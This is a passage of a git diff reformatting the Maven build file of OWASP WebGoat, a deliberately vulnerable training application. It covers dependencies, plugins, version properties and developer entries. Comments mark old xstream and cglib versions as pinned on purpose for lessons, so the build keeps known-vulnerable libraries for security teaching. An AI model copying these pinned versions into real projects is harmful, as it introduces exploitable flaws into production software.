-        <developer>
-            <id>misfir3</id>
-            <name>Jason White</name>
-            <email>jason.white@owasp.org</email>
-        </developer>
-        <developer>
-            <id>zubcevic</id>
-            <name>René Zubcevic</name>
-            <email>rene.zubcevic@owasp.org</email>
-        </developer>
-        <developer>
-            <id>aolle</id>
-            <name>Àngel Ollé Blázquez</name>
-            <email>angel@olleb.com</email>
-        </developer>
-        <developer>
-            <id>jwayman</id>
-            <name>Jeff Wayman</name>
-            <email/>
-        </developer>
-        <developer>
-            <id>dcowden</id>
-            <name>Dave Cowden</name>
-            <email/>
-        </developer>
-        <developer>
-            <id>lawson89</id>
-            <name>Richard Lawson</name>
-            <email/>
-        </developer>
-        <developer>
-            <id>dougmorato</id>
-            <name>Doug Morato</name>
-            <email>doug.morato@owasp.org</email>
-            <organization>OWASP</organization>
-            <organizationUrl>https://github.com/dougmorato</organizationUrl>
-            <timezone>America/New_York</timezone>
-            <properties>
-                <picUrl>https://avatars2.githubusercontent.com/u/9654?v=3&amp;s=150</picUrl>
-            </properties>
-        </developer>
-    </developers>
+  </scm>
 
-    <mailingLists>
-        <mailingList>
-            <name>OWASP WebGoat Mailing List</name>
-            <subscribe>https://lists.owasp.org/mailman/listinfo/owasp-webgoat</subscribe>
-            <unsubscribe>Owasp-webgoat-request@lists.owasp.org</unsubscribe>
-            <post>owasp-webgoat@lists.owasp.org</post>
-            <archive>http://lists.owasp.org/pipermail/owasp-webgoat/</archive>
-        </mailingList>
-    </mailingLists>
+  <issueManagement>
+    <system>Github Issues</system>
+    <url>https://github.com/WebGoat/WebGoat/issues</url>
+  </issueManagement>
 
-    <scm>
-        <url>https://github.com/WebGoat/WebGoat</url>
-        <connection>scm:git:git@github.com:WebGoat/WebGoat.git</connection>
-        <developerConnection>scm:git:git@github.com:WebGoat/WebGoat.git</developerConnection>
-        <tag>HEAD</tag>
-    </scm>
-
-    <issueManagement>
-        <system>Github Issues</system>
-        <url>https://github.com/WebGoat/WebGoat/issues</url>
-    </issueManagement>
-
-    <properties>
-        <!-- Use UTF-8 Encoding -->
-        <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
-        <project.reporting.outputEncoding>UTF-8</project.reporting.outputEncoding>
-        <maven.compiler.source>17</maven.compiler.source>
-        <maven.compiler.target>17</maven.compiler.target>
-        <java.version>17</java.version>
-        <webgoat.port>8080</webgoat.port>
-        <webwolf.port>9090</webwolf.port>
-
-        <!-- Shared properties with plugins and version numbers across submodules-->
-        <asciidoctorj.version>2.5.3</asciidoctorj.version>
-        <bootstrap.version>3.3.7</bootstrap.version>
-        <cglib.version>2.2</cglib.version> <!-- do not update necessary for lesson -->
-        <checkstyle.version>3.1.2</checkstyle.version>
-        <commons-collections.version>3.2.1</commons-collections.version>
-        <commons-lang3.version>3.12.0</commons-lang3.version>
-        <commons-io.version>2.6</commons-io.version>
-        <commons-text.version>1.9</commons-text.version>
-        <guava.version>30.1-jre</guava.version>
-        <jjwt.version>0.9.1</jjwt.version>
-        <jose4j.version>0.7.6</jose4j.version>
-        <jsoup.version>1.14.3</jsoup.version>
-        <jquery.version>3.5.1</jquery.version>
-        <maven-compiler-plugin.version>3.8.0</maven-compiler-plugin.version>
-        <maven-failsafe-plugin.version>2.22.0</maven-failsafe-plugin.version>
-        <maven-jar-plugin.version>3.1.2</maven-jar-plugin.version>
-        <maven-javadoc-plugin.version>3.1.1</maven-javadoc-plugin.version>
-        <maven-source-plugin.version>3.1.0</maven-source-plugin.version>
-        <maven-surefire-plugin.version>3.0.0-M5</maven-surefire-plugin.version>
-        <pmd.version>3.15.0</pmd.version>
-        <thymeleaf.version>3.0.15.RELEASE</thymeleaf.version>
-        <webdriver.version>4.3.1</webdriver.version>
-        <wiremock.version>2.27.2</wiremock.version>
-        <xml-resolver.version>1.2</xml-resolver.version>
-        <xstream.version>1.4.5</xstream.version> <!-- do not update necessary for lesson -->
-        <zxcvbn.version>1.5.2</zxcvbn.version>
-    </properties>
-
-    <dependencyManagement>
-        <dependencies>
-
-            <dependency>
-                <groupId>org.ow2.asm</groupId>
-                <artifactId>asm</artifactId>
-                <version>9.1</version>
-            </dependency>
-
-            <dependency>
-                <groupId>org.apache.commons</groupId>
-                <artifactId>commons-exec</artifactId>
-                <version>1.3</version>
-            </dependency>
-            <dependency>
-                <groupId>org.asciidoctor</groupId>
-                <artifactId>asciidoctorj</artifactId>
-                <version>${asciidoctorj.version}</version>
-            </dependency>
-            <dependency>
-                <!-- jsoup HTML parser library @ https://jsoup.org/ -->
-                <groupId>org.jsoup</groupId>
-                <artifactId>jsoup</artifactId>
-                <version>${jsoup.version}</version>
-            </dependency>
-            <dependency>
-                <groupId>com.nulab-inc</groupId>
-                <artifactId>zxcvbn</artifactId>
-                <version>${zxcvbn.version}</version>
-            </dependency>
-            <dependency>
-                <groupId>com.thoughtworks.xstream</groupId>
-                <artifactId>xstream</artifactId>
-                <version>${xstream.version}</version>
-            </dependency>
-            <dependency>
-                <groupId>cglib</groupId>
-                <artifactId>cglib-nodep</artifactId>
-                <version>${cglib.version}</version>
-            </dependency>
-            <dependency>
-                <groupId>xml-resolver</groupId>
-                <artifactId>xml-resolver</artifactId>
-                <version>${xml-resolver.version}</version>
-            </dependency>
-            <dependency>
-                <groupId>io.jsonwebtoken</groupId>
-                <artifactId>jjwt</artifactId>
-                <version>${jjwt.version}</version>
-            </dependency>
-            <dependency>
-                <groupId>com.google.guava</groupId>
-                <artifactId>guava</artifactId>
-                <version>${guava.version}</version>
-            </dependency>
-            <dependency>
-                <groupId>commons-io</groupId>
-                <artifactId>commons-io</artifactId>
-                <version>${commons-io.version}</version>
-            </dependency>
-            <dependency>
-                <groupId>org.apache.commons</groupId>
-                <artifactId>commons-text</artifactId>
-                <version>${commons-text.version}</version>
-            </dependency>
-            <dependency>
-                <groupId>org.bitbucket.b_c</groupId>
-                <artifactId>jose4j</artifactId>
-                <version>${jose4j.version}</version>
-            </dependency>
-            <dependency>
-                <groupId>org.webjars</groupId>
-                <artifactId>bootstrap</artifactId>
-                <version>${bootstrap.version}</version>
-            </dependency>
-            <dependency>
-                <groupId>org.webjars</groupId>
-                <artifactId>jquery</artifactId>
-                <version>${jquery.version}</version>
-            </dependency>
-            <dependency>
-                <groupId>com.github.tomakehurst</groupId>
-                <artifactId>wiremock</artifactId>
-                <version>${wiremock.version}</version>
-            </dependency>
-            <dependency>
-                <groupId>io.github.bonigarcia</groupId>
-                <artifactId>webdrivermanager</artifactId>
-                <version>${webdriver.version}</version>
-            </dependency>
-            <dependency>
-                <groupId>org.apache.commons</groupId>
-                <artifactId>commons-compress</artifactId>
-                <version>1.21</version>
-            </dependency>
-            <dependency>
-                <groupId>org.jruby</groupId>
-                <artifactId>jruby</artifactId>
-                <version>9.3.6.0</version>
-            </dependency>
-        </dependencies>
-    </dependencyManagement>
-
-    <profiles>
-        <profile>
-            <id>local-server</id>
-        </profile>
-        <profile>
-            <id>start-server</id>
-            <activation>
-                <activeByDefault>true</activeByDefault>
-            </activation>
-            <build>
-                <plugins>
-                    <plugin>
-                        <groupId>org.codehaus.mojo</groupId>
-                        <artifactId>build-helper-maven-plugin</artifactId>
-                        <executions>
-                            <execution>
-                                <id>reserve-container-port</id>
-                                <goals>
-                                    <goal>reserve-network-port</goal>
-                                </goals>
-                                <phase>process-resources</phase>
-                                <configuration>
-                                    <portNames>
-                                        <portName>webgoat.port</portName>
-                                        <portName>webwolf.port</portName>
-                                        <portName>jmxPort</portName>
-                                    </portNames>
-                                </configuration>
-                            </execution>
-                        </executions>
-                    </plugin>
-                    <plugin>
-                        <groupId>com.bazaarvoice.maven.plugins</groupId>
-                        <artifactId>process-exec-maven-plugin</artifactId>
-                        <version>0.9</version>
-                        <executions>
-                            <execution>
-                                <id>start-jar</id>
-                                <phase>pre-integration-test</phase>
-                                <goals>
-                                    <goal>start</goal>
-                                </goals>
-                                <configuration>
-                                    <workingDir>${project.build.directory}</workingDir>
-                                    <arguments>
-                                        <argument>java</argument>
-                                        <argument>-jar</argument>
-                                        <argument>-Dlogging.pattern.console=</argument>
-                                        <argument>-Dspring.main.banner-mode=off</argument>
-                                        <argument>-Dspring.datasource.url=jdbc:hsqldb:file:${java.io.tmpdir}/webgoat
-                                        </argument>
-                                        <argument>-Dwebgoat.port=${webgoat.port}</argument>
-                                        <argument>-Dwebwolf.port=${webwolf.port}</argument>
-                                        <argument>--add-opens</argument>
-                                        <argument>java.base/java.lang=ALL-UNNAMED</argument>
-                                        <argument>--add-opens</argument>
-                                        <argument>java.base/java.util=ALL-UNNAMED</argument>
-                                        <argument>--add-opens</argument>
-                                        <argument>java.base/java.lang.reflect=ALL-UNNAMED</argument>
-                                        <argument>--add-opens</argument>
-                                        <argument>java.base/java.text=ALL-UNNAMED</argument>
-                                        <argument>--add-opens</argument>
-                                        <argument>java.desktop/java.beans=ALL-UNNAMED</argument>
-                                        <argument>--add-opens</argument>
-                                        <argument>java.desktop/java.awt.font=ALL-UNNAMED</argument>
-                                        <argument>--add-opens</argument>
-                                        <argument>java.base/sun.nio.ch=ALL-UNNAMED</argument>
-                                        <argument>--add-opens</argument>
-                                        <argument>java.base/java.io=ALL-UNNAMED</argument>
-                                        <argument>--add-opens</argument>
-                                        <argument>java.base/java.util=ALL-UNNAMED</argument>
-                                        <argument>
-                                            ${project.build.directory}/webgoat-${project.version}.jar
-                                        </argument>
-                                    </arguments>
-                                    <waitForInterrupt>false</waitForInterrupt>
-                                    <healthcheckUrl>http://localhost:${webgoat.port}/WebGoat/</healthcheckUrl>
-                                </configuration>
-                            </execution>
-                            <execution>
-                                <id>stop-jar-process</id>
-                                <phase>post-integration-test</phase>
-                                <goals>
-                                    <goal>stop-all</goal>
-                                </goals>
-                            </execution>
-                        </executions>
-                    </plugin>
-                </plugins>
-            </build>
-        </profile>
-        <profile>
-            <id>owasp</id>
-            <activation>
-                <activeByDefault>false</activeByDefault>
-            </activation>
-            <build>
-                <plugins>
-                    <plugin>
-                        <groupId>org.owasp</groupId>
-                        <artifactId>dependency-check-maven</artifactId>
-                        <version>6.5.1</version>
-                        <configuration>
-                            <failBuildOnCVSS>7</failBuildOnCVSS>
-                            <skipProvidedScope>false</skipProvidedScope>
-                            <skipRuntimeScope>false</skipRuntimeScope>
-                            <suppressionFiles>
-                                <!--suppress UnresolvedMavenProperty -->
-                                <suppressionFile>
-                                    ${maven.multiModuleProjectDirectory}/config/dependency-check/project-suppression.xml
-                                </suppressionFile>
-                            </suppressionFiles>
-                        </configuration>
-                        <executions>
-                            <execution>
-                                <goals>
-                                    <goal>check</goal>
-                                </goals>
-                            </execution>
-                        </executions>
-                    </plugin>
-                </plugins>
-            </build>
-        </profile>
-    </profiles>
+  <properties>
 
+    <!-- Shared properties with plugins and version numbers across submodules-->
+    <asciidoctorj.version>2.5.3</asciidoctorj.version>
+    <bootstrap.version>3.3.7</bootstrap.version>
+    <cglib.version>2.2</cglib.version>
+    <!-- do not update necessary for lesson -->
+    <checkstyle.version>3.1.2</checkstyle.version>
+    <commons-collections.version>3.2.1</commons-collections.version>
+    <commons-io.version>2.6</commons-io.version>
+    <commons-lang3.version>3.12.0</commons-lang3.version>
+    <commons-text.version>1.9</commons-text.version>
+    <guava.version>30.1-jre</guava.version>
+    <java.version>17</java.version>
+    <jjwt.version>0.9.1</jjwt.version>
+    <jose4j.version>0.7.6</jose4j.version>
+    <jquery.version>3.5.1</jquery.version>
+    <jsoup.version>1.14.3</jsoup.version>
+    <maven-compiler-plugin.version>3.8.0</maven-compiler-plugin.version>
+    <maven-failsafe-plugin.version>2.22.0</maven-failsafe-plugin.version>
+    <maven-jar-plugin.version>3.1.2</maven-jar-plugin.version>
+    <maven-javadoc-plugin.version>3.1.1</maven-javadoc-plugin.version>
+    <maven-source-plugin.version>3.1.0</maven-source-plugin.version>
+    <maven-surefire-plugin.version>3.0.0-M5</maven-surefire-plugin.version>
+    <maven.compiler.source>17</maven.compiler.source>
+    <maven.compiler.target>17</maven.compiler.target>
+    <pmd.version>3.15.0</pmd.version>
+    <!-- Use UTF-8 Encoding -->
+    <project.build.sourceEncoding>UTF-8</project.build.sourceEncoding>
+    <project.reporting.outputEncoding>UTF-8</project.reporting.outputEncoding>
+    <thymeleaf.version>3.0.15.RELEASE</thymeleaf.version>
+    <webdriver.version>4.3.1</webdriver.version>
+    <webgoat.port>8080</webgoat.port>
+    <webwolf.port>9090</webwolf.port>
+    <wiremock.version>2.27.2</wiremock.version>
+    <xml-resolver.version>1.2</xml-resolver.version>
+    <xstream.version>1.4.5</xstream.version>
+    <!-- do not update necessary for lesson -->
+    <zxcvbn.version>1.5.2</zxcvbn.version>
+  </properties>
 
+  <dependencyManagement>
     <dependencies>
-        <dependency>
-            <groupId>org.apache.commons</groupId>
-            <artifactId>commons-exec</artifactId>
-        </dependency>
-        <dependency>
-            <groupId>org.springframework.boot</groupId>
-            <artifactId>spring-boot-starter-validation</artifactId>
-        </dependency>
-        <dependency>
-            <groupId>org.projectlombok</groupId>
-            <artifactId>lombok</artifactId>
-            <scope>provided</scope>
-            <optional>true</optional>
-        </dependency>
-        <dependency>
-            <groupId>javax.xml.bind</groupId>
-            <artifactId>jaxb-api</artifactId>
-        </dependency>
-        <dependency>
-            <groupId>org.springframework.boot</groupId>
-            <artifactId>spring-boot-starter-undertow</artifactId>
-        </dependency>
-        <dependency>
-            <groupId>org.springframework.boot</groupId>
-            <artifactId>spring-boot-starter-web</artifactId>
-            <exclusions>
-                <exclusion>
-                    <groupId>org.springframework.boot</groupId>
-                    <artifactId>spring-boot-starter-tomcat</artifactId>
-                </exclusion>
-            </exclusions>
-        </dependency>
-        <dependency>
-            <groupId>org.springframework.boot</groupId>
-            <artifactId>spring-boot-starter-actuator</artifactId>
-        </dependency>
-        <dependency>
-            <groupId>org.flywaydb</groupId>
-            <artifactId>flyway-core</artifactId>
-        </dependency>
-        <dependency>
-            <groupId>org.asciidoctor</groupId>
-            <artifactId>asciidoctorj</artifactId>
-        </dependency>
-        <dependency>
-            <groupId>org.springframework.boot</groupId>
-            <artifactId>spring-boot-starter-data-jpa</artifactId>
-        </dependency>
-        <dependency>
-            <groupId>org.springframework.boot</groupId>
-            <artifactId>spring-boot-starter-security</artifactId>
-        </dependency>
-        <dependency>
-            <groupId>org.springframework.boot</groupId>
-            <artifactId>spring-boot-starter-thymeleaf</artifactId>
-        </dependency>
-        <dependency>
-            <groupId>org.thymeleaf.extras</groupId>
-            <artifactId>thymeleaf-extras-springsecurity5</artifactId>
-        </dependency>
-        <dependency>
-            <groupId>org.hsqldb</groupId>
-            <artifactId>hsqldb</artifactId>
-        </dependency>
-        <dependency>
-            <groupId>org.jsoup</groupId>
-            <artifactId>jsoup</artifactId>
-        </dependency>
-        <dependency>
-            <groupId>com.nulab-inc</groupId>
-            <artifactId>zxcvbn</artifactId>
-        </dependency>
-        <dependency>
-            <groupId>com.thoughtworks.xstream</groupId>
-            <artifactId>xstream</artifactId>
-        </dependency>
-        <dependency>
-            <groupId>cglib</groupId>
-            <artifactId>cglib-nodep</artifactId>
-        </dependency>
-        <dependency>
-            <groupId>xml-resolver</groupId>
-            <artifactId>xml-resolver</artifactId>
-        </dependency>
-        <dependency>
-            <groupId>io.jsonwebtoken</groupId>
-            <artifactId>jjwt</artifactId>
-        </dependency>
-        <dependency>
-            <groupId>com.google.guava</groupId>
-            <artifactId>guava</artifactId>
-        </dependency>
-        <dependency>
-            <groupId>commons-io</groupId>
-            <artifactId>commons-io</artifactId>
-        </dependency>
-        <dependency>
-            <groupId>org.apache.commons</groupId>
-            <artifactId>commons-lang3</artifactId>
-        </dependency>
-        <dependency>
-            <groupId>org.apache.commons</groupId>
-            <artifactId>commons-text</artifactId>
-        </dependency>
-        <dependency>
-            <groupId>org.bitbucket.b_c</groupId>
-            <artifactId>jose4j</artifactId>
-        </dependency>
-        <dependency>
-            <groupId>org.webjars</groupId>
-            <artifactId>bootstrap</artifactId>
-        </dependency>
-        <dependency>
-            <groupId>org.webjars</groupId>
-            <artifactId>jquery</artifactId>
-        </dependency>
-        <dependency>
-            <groupId>org.glassfish.jaxb</groupId>
-            <artifactId>jaxb-runtime</artifactId>
-        </dependency>
 
-        <dependency>
-            <groupId>org.springframework.boot</groupId>
-            <artifactId>spring-boot-starter-test</artifactId>
-            <scope>test</scope>
-        </dependency>
-        <dependency>
-            <groupId>org.springframework.security</groupId>
-            <artifactId>spring-security-test</artifactId>
-            <scope>test</scope>
-        </dependency>
-        <dependency>
-            <groupId>com.github.tomakehurst</groupId>
-            <artifactId>wiremock</artifactId>
-            <scope>test</scope>
-        </dependency>
-        <dependency>
-            <groupId>io.rest-assured</groupId>
-            <artifactId>rest-assured</artifactId>
-            <scope>test</scope>
-        </dependency>
+      <dependency>
+        <groupId>org.ow2.asm</groupId>
+        <artifactId>asm</artifactId>
+        <version>9.1</version>
+      </dependency>
+
+      <dependency>
+        <groupId>org.apache.commons</groupId>
+        <artifactId>commons-exec</artifactId>
+        <version>1.3</version>
+      </dependency>
+      <dependency>
+        <groupId>org.asciidoctor</groupId>
+        <artifactId>asciidoctorj</artifactId>
+        <version>${asciidoctorj.version}</version>
+      </dependency>
+      <dependency>
+        <!-- jsoup HTML parser library @ https://jsoup.org/ -->
+        <groupId>org.jsoup</groupId>
+        <artifactId>jsoup</artifactId>
+        <version>${jsoup.version}</version>
+      </dependency>
+      <dependency>
+        <groupId>com.nulab-inc</groupId>
+        <artifactId>zxcvbn</artifactId>
+        <version>${zxcvbn.version}</version>
+      </dependency>
+      <dependency>
+        <groupId>com.thoughtworks.xstream</groupId>
+        <artifactId>xstream</artifactId>
+        <version>${xstream.version}</version>
+      </dependency>
+      <dependency>
+        <groupId>cglib</groupId>
+        <artifactId>cglib-nodep</artifactId>
+        <version>${cglib.version}</version>
+      </dependency>
+      <dependency>
+        <groupId>xml-resolver</groupId>
+        <artifactId>xml-resolver</artifactId>
+        <version>${xml-resolver.version}</version>
+      </dependency>
+      <dependency>
+        <groupId>io.jsonwebtoken</groupId>
+        <artifactId>jjwt</artifactId>
+        <version>${jjwt.version}</version>
+      </dependency>
+      <dependency>
+        <groupId>com.google.guava</groupId>
+        <artifactId>guava</artifactId>
+        <version>${guava.version}</version>
+      </dependency>
+      <dependency>
+        <groupId>commons-io</groupId>
+        <artifactId>commons-io</artifactId>
+        <version>${commons-io.version}</version>
+      </dependency>
+      <dependency>
+        <groupId>org.apache.commons</groupId>
+        <artifactId>commons-text</artifactId>
+        <version>${commons-text.version}</version>
+      </dependency>
+      <dependency>
+        <groupId>org.bitbucket.b_c</groupId>
+        <artifactId>jose4j</artifactId>
+        <version>${jose4j.version}</version>
+      </dependency>
+      <dependency>
+        <groupId>org.webjars</groupId>
+        <artifactId>bootstrap</artifactId>
+        <version>${bootstrap.version}</version>
+      </dependency>
+      <dependency>
+        <groupId>org.webjars</groupId>
+        <artifactId>jquery</artifactId>
+        <version>${jquery.version}</version>
+      </dependency>
+      <dependency>
+        <groupId>com.github.tomakehurst</groupId>
+        <artifactId>wiremock</artifactId>
+        <version>${wiremock.version}</version>
+      </dependency>
+      <dependency>
+        <groupId>io.github.bonigarcia</groupId>
+        <artifactId>webdrivermanager</artifactId>
+        <version>${webdriver.version}</version>
+      </dependency>
+      <dependency>
+        <groupId>org.apache.commons</groupId>
+        <artifactId>commons-compress</artifactId>
+        <version>1.21</version>
+      </dependency>
+      <dependency>
+        <groupId>org.jruby</groupId>
+        <artifactId>jruby</artifactId>
+        <version>9.3.6.0</version>
+      </dependency>
     </dependencies>
+  </dependencyManagement>
 
-    <build>
+  <dependencies>
+    <dependency>
+      <groupId>org.apache.commons</groupId>
+      <artifactId>commons-exec</artifactId>
+    </dependency>
+    <dependency>
+      <groupId>org.springframework.boot</groupId>
+      <artifactId>spring-boot-starter-validation</artifactId>
+    </dependency>
+    <dependency>
+      <groupId>org.projectlombok</groupId>
+      <artifactId>lombok</artifactId>
+      <scope>provided</scope>
+      <optional>true</optional>
+    </dependency>
+    <dependency>
+      <groupId>javax.xml.bind</groupId>
+      <artifactId>jaxb-api</artifactId>
+    </dependency>
+    <dependency>
+      <groupId>org.springframework.boot</groupId>
+      <artifactId>spring-boot-starter-undertow</artifactId>
+    </dependency>
+    <dependency>
+      <groupId>org.springframework.boot</groupId>
+      <artifactId>spring-boot-starter-web</artifactId>
+      <exclusions>
+        <exclusion>
+          <groupId>org.springframework.boot</groupId>
+          <artifactId>spring-boot-starter-tomcat</artifactId>
+        </exclusion>
+      </exclusions>
+    </dependency>
+    <dependency>
+      <groupId>org.springframework.boot</groupId>
+      <artifactId>spring-boot-starter-actuator</artifactId>
+    </dependency>
+    <dependency>
+      <groupId>org.flywaydb</groupId>
+      <artifactId>flyway-core</artifactId>
+    </dependency>
+    <dependency>
+      <groupId>org.asciidoctor</groupId>
+      <artifactId>asciidoctorj</artifactId>
+    </dependency>
+    <dependency>
+      <groupId>org.springframework.boot</groupId>
+      <artifactId>spring-boot-starter-data-jpa</artifactId>
+    </dependency>
+    <dependency>
+      <groupId>org.springframework.boot</groupId>
+      <artifactId>spring-boot-starter-security</artifactId>
+    </dependency>
+    <dependency>
+      <groupId>org.springframework.boot</groupId>
+      <artifactId>spring-boot-starter-thymeleaf</artifactId>
+    </dependency>
+    <dependency>
+      <groupId>org.thymeleaf.extras</groupId>
+      <artifactId>thymeleaf-extras-springsecurity5</artifactId>
+    </dependency>
+    <dependency>
+      <groupId>org.hsqldb</groupId>
+      <artifactId>hsqldb</artifactId>
+    </dependency>
+    <dependency>
+      <groupId>org.jsoup</groupId>
+      <artifactId>jsoup</artifactId>
+    </dependency>
+    <dependency>
+      <groupId>com.nulab-inc</groupId>
+      <artifactId>zxcvbn</artifactId>
+    </dependency>
+    <dependency>
+      <groupId>com.thoughtworks.xstream</groupId>
+      <artifactId>xstream</artifactId>
+    </dependency>
+    <dependency>
+      <groupId>cglib</groupId>
+      <artifactId>cglib-nodep</artifactId>
+    </dependency>
+    <dependency>
+      <groupId>xml-resolver</groupId>
+      <artifactId>xml-resolver</artifactId>
+    </dependency>
+    <dependency>
+      <groupId>io.jsonwebtoken</groupId>
+      <artifactId>jjwt</artifactId>
+    </dependency>
+    <dependency>
+      <groupId>com.google.guava</groupId>
+      <artifactId>guava</artifactId>
+    </dependency>
+    <dependency>
+      <groupId>commons-io</groupId>
+      <artifactId>commons-io</artifactId>
+    </dependency>
+    <dependency>
+      <groupId>org.apache.commons</groupId>
+      <artifactId>commons-lang3</artifactId>
+    </dependency>
+    <dependency>
+      <groupId>org.apache.commons</groupId>
+      <artifactId>commons-text</artifactId>
+    </dependency>
+    <dependency>
+      <groupId>org.bitbucket.b_c</groupId>
+      <artifactId>jose4j</artifactId>
+    </dependency>
+    <dependency>
+      <groupId>org.webjars</groupId>
+      <artifactId>bootstrap</artifactId>
+    </dependency>
+    <dependency>
+      <groupId>org.webjars</groupId>
+      <artifactId>jquery</artifactId>
+    </dependency>
+    <dependency>
+      <groupId>org.glassfish.jaxb</groupId>
+      <artifactId>jaxb-runtime</artifactId>
+    </dependency>
+
+    <dependency>
+      <groupId>org.springframework.boot</groupId>
+      <artifactId>spring-boot-starter-test</artifactId>
+      <scope>test</scope>
+    </dependency>
+    <dependency>
+      <groupId>org.springframework.security</groupId>
+      <artifactId>spring-security-test</artifactId>
+      <scope>test</scope>
+    </dependency>
+    <dependency>
+      <groupId>com.github.tomakehurst</groupId>
+      <artifactId>wiremock</artifactId>
+      <scope>test</scope>
+    </dependency>
+    <dependency>
+      <groupId>io.rest-assured</groupId>
+      <artifactId>rest-assured</artifactId>
+      <scope>test</scope>
+    </dependency>
+  </dependencies>
+
+  <repositories>
+    <repository>
+      <snapshots>
+        <enabled>false</enabled>
+      </snapshots>
+      <id>central</id>
+      <url>https://repo.maven.apache.org/maven2</url>
+    </repository>
+  </repositories>
+  <pluginRepositories>
+    <pluginRepository>
+      <snapshots>
+        <enabled>false</enabled>
+      </snapshots>
+      <id>central</id>
+      <url>https://repo.maven.apache.org/maven2</url>
+    </pluginRepository>
+  </pluginRepositories>
+
+  <build>
+    <plugins>
+      <plugin>
+        <groupId>org.springframework.boot</groupId>
+        <artifactId>spring-boot-maven-plugin</artifactId>
+        <configuration>
+          <excludeDevtools>true</excludeDevtools>
+          <executable>true</executable>
+          <mainClass>org.owasp.webgoat.server.StartWebGoat</mainClass>
+          <!-- See http://docs.spring.io/spring-boot/docs/current/reference/html/howto-build.html#howto-extract-specific-libraries-when-an-executable-jar-runs -->
+          <requiresUnpack>
+            <dependency>
+              <groupId>org.asciidoctor</groupId>
+              <artifactId>asciidoctorj</artifactId>
+            </dependency>
+          </requiresUnpack>
+        </configuration>
+        <executions>
+          <execution>
+            <goals>
+              <goal>repackage</goal>
+            </goals>
+          </execution>
+        </executions>
+      </plugin>
+      <plugin>
+        <groupId>org.codehaus.mojo</groupId>
+        <artifactId>build-helper-maven-plugin</artifactId>
+        <executions>
+          <execution>
+            <id>add-integration-test-source-as-test-sources</id>
+            <goals>
+              <goal>add-test-source</goal>
+            </goals>
+            <phase>generate-test-sources</phase>
+            <configuration>
+              <sources>
+                <source>src/it/java</source>
+              </sources>
+            </configuration>
+          </execution>
+        </executions>
+      </plugin>
+      <plugin>
+        <groupId>org.apache.maven.plugins</groupId>
+        <artifactId>maven-failsafe-plugin</artifactId>
+        <configuration>
+          <systemPropertyVariables>
+            <logback.configurationFile>${basedir}/src/test/resources/logback-test.xml</logback.configurationFile>
+          </systemPropertyVariables>
+          <argLine>-Xmx512m -Dwebgoatport=${webgoat.port} -Dwebwolfport=${webwolf.port}</argLine>
+          <includes>org/owasp/webgoat/*Test</includes>
+        </configuration>
+        <executions>
+          <execution>
+            <id>integration-test</id>
+            <goals>
+              <goal>integration-test</goal>
+            </goals>
+          </execution>
+          <execution>
+            <id>verify</id>
+            <goals>
+              <goal>verify</goal>
+            </goals>
+          </execution>
+        </executions>
+      </plugin>
+      <plugin>
+        <groupId>org.apache.maven.plugins</groupId>
+        <artifactId>maven-surefire-plugin</artifactId>
+        <version>${maven-surefire-plugin.version}</version>
+        <configuration>
+          <argLine>--add-opens java.base/sun.nio.ch=ALL-UNNAMED --add-opens java.base/java.io=ALL-UNNAMED
+                        --add-opens java.base/sun.nio.ch=ALL-UNNAMED --add-opens java.base/java.io=ALL-UNNAMED
+                        --add-opens java.base/java.util=ALL-UNNAMED --add-opens java.base/java.lang.reflect=ALL-UNNAMED
+                        --add-opens java.base/java.text=ALL-UNNAMED --add-opens java.desktop/java.awt.font=ALL-UNNAMED</argLine>
+          <excludes>
+            <exclude>**/*IntegrationTest.java</exclude>
+            <exclude>src/it/java</exclude>
+            <exclude>org/owasp/webgoat/*Test</exclude>
+          </excludes>
+        </configuration>
+      </plugin>
+      <plugin>
+        <groupId>org.apache.maven.plugins</groupId>
+        <artifactId>maven-checkstyle-plugin</artifactId>
+        <version>${checkstyle.version}</version>
+        <configuration>
+          <encoding>UTF-8</encoding>
+          <consoleOutput>true</consoleOutput>
+          <failsOnError>true</failsOnError>
+          <configLocation>config/checkstyle/checkstyle.xml</configLocation>
+          <suppressionsLocation>config/checkstyle/suppressions.xml</suppressionsLocation>
+          <suppressionsFileExpression>checkstyle.suppressions.file</suppressionsFileExpression>
+        </configuration>
+      </plugin>
+      <plugin>
+        <groupId>com.diffplug.spotless</groupId>
+        <artifactId>spotless-maven-plugin</artifactId>
+        <version>2.29.0</version>
+        <configuration>
+          <formats>
+            <format>
+              <includes>
+                <include>.gitignore</include>
+              </includes>
+              <trimTrailingWhitespace></trimTrailingWhitespace>
+              <endWithNewline></endWithNewline>
+              <indent>
+                <tabs>true</tabs>
+                <spacesPerTab>4</spacesPerTab>
+              </indent>
+            </format>
+          </formats>
+          <markdown>
+            <includes>
+              <include>**/*.md</include>
+            </includes>
+            <flexmark></flexmark>
+          </markdown>
+          <java>
+            <removeUnusedImports></removeUnusedImports>
+            <googleJavaFormat>
+              <style>GOOGLE</style>
+              <reflowLongStrings>true</reflowLongStrings>
+            </googleJavaFormat>
+          </java>
+          <pom>
+            <sortPom>
+              <encoding>UTF-8</encoding>
+              <lineSeparator>${line.separator}</lineSeparator>
+              <expandEmptyElements>true</expandEmptyElements>
+              <spaceBeforeCloseEmptyElement>false</spaceBeforeCloseEmptyElement>
+              <keepBlankLines>true</keepBlankLines>
+              <nrOfIndentSpace>2</nrOfIndentSpace>
+              <indentBlankLines>false</indentBlankLines>
+              <indentSchemaLocation>false</indentSchemaLocation>
+              <predefinedSortOrder>recommended_2008_06</predefinedSortOrder>
+              <sortProperties>true</sortProperties>
+              <sortModules>true</sortModules>
+              <sortExecutions>true</sortExecutions>
+            </sortPom>
+          </pom>
+        </configuration>
+        <executions>
+          <execution>
+            <goals>
+              <goal>check</goal>
+            </goals>
+          </execution>
+        </executions>
+      </plugin>
+      <plugin>
+        <groupId>org.apache.maven.plugins</groupId>
+        <artifactId>maven-enforcer-plugin</artifactId>
+        <version>3.0.0</version>
+        <executions>
+          <execution>
+            <id>restrict-log4j-versions</id>
+            <goals>
+              <goal>enforce</goal>
+            </goals>
+            <phase>validate</phase>
+            <configuration>
+              <rules>
+                <bannedDependencies>
+                  <excludes combine.children="append">
+                    <exclude>org.apache.logging.log4j:log4j-core</exclude>
+                  </excludes>
+                </bannedDependencies>
+              </rules>
+              <fail>true</fail>
+            </configuration>
+          </execution>
+        </executions>
+      </plugin>
+      <plugin>
+        <groupId>org.apache.maven.plugins</groupId>
+        <artifactId>maven-compiler-plugin</artifactId>
+        <configuration>
+          <source>17</source>
+          <target>17</target>
+        </configuration>
+      </plugin>
+    </plugins>
+  </build>
+
+  <profiles>
+    <profile>
+      <id>local-server</id>
+    </profile>
+    <profile>
+      <id>start-server</id>
+      <activation>
